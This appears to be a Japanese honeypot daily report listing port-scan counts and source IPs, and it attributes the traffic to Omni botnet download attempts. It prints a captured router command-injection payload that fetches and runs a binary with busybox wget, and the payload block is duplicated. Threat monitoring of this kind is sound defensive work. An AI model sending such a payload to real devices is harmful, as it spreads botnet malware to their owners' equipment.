Honeypot簡易分析(308日目:6/21)となります。
◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>
<ポート検知数(30日平均比)>
| ポート番号 | サービス | 件数 | 件数差(30日平均) |
|---|---|---|---|
| 445 | smb | 3789 | -91 |
| 23 | telnet | 1155 | -420 |
| 5900 | vnc | 334 | -4748 |
| 3389 | rdp | 299 | -15 |
| 8080 | proxy | 87 | 43 |
| 3306 | mysql | 74 | -174 |
| 1911 | mtp | 70 | 69 |
| 3393 | d2k-tapestry1 | 66 | 46 |
| 3399 | Unknown | 64 | 36 |
| 3398 | mercantile | 62 | 44 |
| 新規マルウェア | パス |
| 89[.]34[.]26[.]202 | POST /ctrlt/DeviceUpgrade_1 http/1.1 |
| 178[.]62[.]114[.]122 | POST /ctrlt/DeviceUpgrade_1 http/1.1 |
| 104[.]248[.]93[.]159 | POST /ctrlt/DeviceUpgrade_1 http/1.1 |
Omni ボットネットをダウンロードしようとしている通信となります。
https://www.paloaltonetworks.jp/company/in-the-news/2018/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns
ペイロード
<?xml version="1.0" ?>.
<NewStatusURL>$(/bin/busybox wget -g xxx.xxx.xxx.xxx -l /tmp/binary -r orbitclien.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei.supergay)</NewStatusURL>.<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>.</u:Upgrade>. </s:Body>. </s:Envelope>
◾️WoWHoneeypot
https://www.paloaltonetworks.jp/company/in-the-news/2018/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns
ペイロード
<?xml version="1.0" ?>.
<NewStatusURL>$(/bin/busybox wget -g xxx.xxx.xxx.xxx -l /tmp/binary -r orbitclien.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei.supergay)</NewStatusURL>.<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>.</u:Upgrade>. </s:Body>. </s:Envelope>
◾️WoWHoneeypot
<国別検知数および検知数>
<検知パス一覧>
<新規検知パス一覧>
